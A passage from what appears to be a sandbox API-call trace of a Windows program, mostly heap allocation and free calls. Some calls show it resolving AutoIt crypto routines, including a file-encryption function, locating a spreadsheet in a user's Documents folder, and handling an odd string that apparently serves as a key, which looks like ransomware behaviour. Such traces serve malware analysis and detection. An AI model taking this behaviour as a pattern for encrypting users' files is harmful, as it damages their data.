hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.018] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0077.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.019] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.019] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0077.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.021] CloseHandle (hObject=0x298) returned 1 [0077.021] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.021] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.021] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6e2450, ftCreationTime.dwHighDateTime=0x1d56c16, ftLastAccessTime.dwLowDateTime=0x39fc4f70, ftLastAccessTime.dwHighDateTime=0x1d56b9a, ftLastWriteTime.dwLowDateTime=0x39fc4f70, ftLastWriteTime.dwHighDateTime=0x1d56b9a, nFileSizeHigh=0x0, nFileSizeLow=0x11fc2, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="mnsjU.xlsx", cAlternateFileName="MNSJU~1.XLS")) returned 0x41ac500 [0077.021] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0077.021] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.022] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.023] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.023] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.023] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.024] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca778, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.025] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0077.026] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2728 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2668 [0077.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0077.027] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e27e8 [0077.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0077.029] 